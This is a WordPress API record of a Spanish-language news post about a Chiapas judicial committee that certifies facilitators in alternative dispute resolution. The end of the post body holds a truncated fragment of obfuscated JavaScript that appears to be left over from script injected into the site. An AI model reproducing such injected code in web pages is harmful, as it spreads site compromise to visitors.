{"id":7193,"date":"2022-12-07T03:58:54","date_gmt":"2022-12-07T03:58:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7193"},"modified":"2022-12-07T04:00:17","modified_gmt":"2022-12-07T04:00:17","slug":"el-poder-judicial-de-chiapas-avanza-hacia-la-profesionalizacion-de-las-y-los-operadores-judiciales-especializados-en-materia-de-justicia-alternativa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7193","title":{"rendered":"El Poder Judicial de Chiapas avanza hacia la profesionalizaci\u00f3n de las y los operadores judiciales especializados en materia de Justicia Alternativa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221204-WA0016-768x1024.jpg\" alt=\"\" class=\"wp-image-7194\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221204-WA0016-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221204-WA0016-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221204-WA0016.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>04 de diciembre del 2022<\/p>\n\n\n\n<p>El Poder Judicial del Estado que titula el magistrado presidente del Tribunal Superior de Justicia, y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, comprometido con la profesionalizaci\u00f3n de las y los operadores de justicia, llev\u00f3 a cabo la Segunda Sesi\u00f3n Extraordinaria del Comit\u00e9 de Certificaci\u00f3n de Facilitadores Judiciales Especializados, en Mecanismos Alternativos de Soluci\u00f3n de Controversias en Materia Penal y de Justicia para Adolescentes.<\/p>\n\n\n\n<p>En este acto, estuvo presente en su car\u00e1cter de presidenta del Comit\u00e9, la consejera de la Judicatura, Isela de Jes\u00fas Mart\u00ednez Flores, quien brind\u00f3 un mensaje de bienvenida a las y los asistentes a esta sesi\u00f3n, donde expres\u00f3 su reconocimiento a la labor contin\u00faa y coordinada que realiza el Centro Estatal de Justicia alternativa del Estado (CEJA) en colaboraci\u00f3n con el Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial.<\/p>\n\n\n\n<p>Adem\u00e1s, destac\u00f3 la importancia de la capacitaci\u00f3n y actualizaci\u00f3n constante de las personas servidoras p\u00fablicas, que operan los mecanismos alternativos de soluci\u00f3n de controversias, para que el Poder Judicial cuente con profesionistas a la vanguardia con los conocimientos y los perfiles deseados.<\/p>\n\n\n\n<p>Despu\u00e9s de dicho mensaje, se continu\u00f3 con el desarrollo de la Sesi\u00f3n siguiendo el Orden d\u00eda, moderado por la directora general del CEJA, Elisheba Goldhaber Pasillas, en su car\u00e1cter de secretaria t\u00e9cnica.<\/p>\n\n\n\n<p>Cabe destacar, que este Comit\u00e9 de Certificaci\u00f3n es un \u00f3rgano auxiliar que tiene por objeto la implementaci\u00f3n y observancia de los lineamientos para la Certificaci\u00f3n de Facilitadores Judiciales especializados en Mecanismos Alternativos de Soluci\u00f3n de Controversias en Materia Penal y de justicia para Adolescentes, de los Tribunales Superiores y Supremos de Justicia de las entidades federativas de la Rep\u00fablica Mexicana.<\/p>\n\n\n\n<p>Adem\u00e1s, estuvieron presentes como vocales del Comit\u00e9: el magistrado presidente de la Ponencia A Primer Tribunal de Alzada en Materia Penal, zona 01 Tuxtla, Carlos Alberto Bello Avenda\u00f1o; la jueza de Primera Instancia Especializada en Justicia Penal Para Adolescentes, Jaqueline \u00c1ngel Juan, as\u00ed como el Director de Instituto de Formaci\u00f3n Profesionalizaci\u00f3n y Carrera Judicial Pedro Farro \u00c1lvarez.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>04 de diciembre del 2022 El Poder Judicial del Estado que titula el magistrado presidente del Tribunal Superior de Justicia, y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, comprometido con la profesionalizaci\u00f3n de las y los operadores de justicia, llev\u00f3 a cabo la Segunda Sesi\u00f3n Extraordinaria del Comit\u00e9 de Certificaci\u00f3n de Facilitadores Judiciales Especializados, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7194,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20,17,6],"tags":[19],"class_list":["post-7193","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-minuto","category-portada","category-tuxtla","tag-minuto"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7193","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7193"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7193\/revisions"}],"predecessor-version":[{"id":7195,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7193\/revisions\/7195"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7194"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7193"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7193"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7193"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}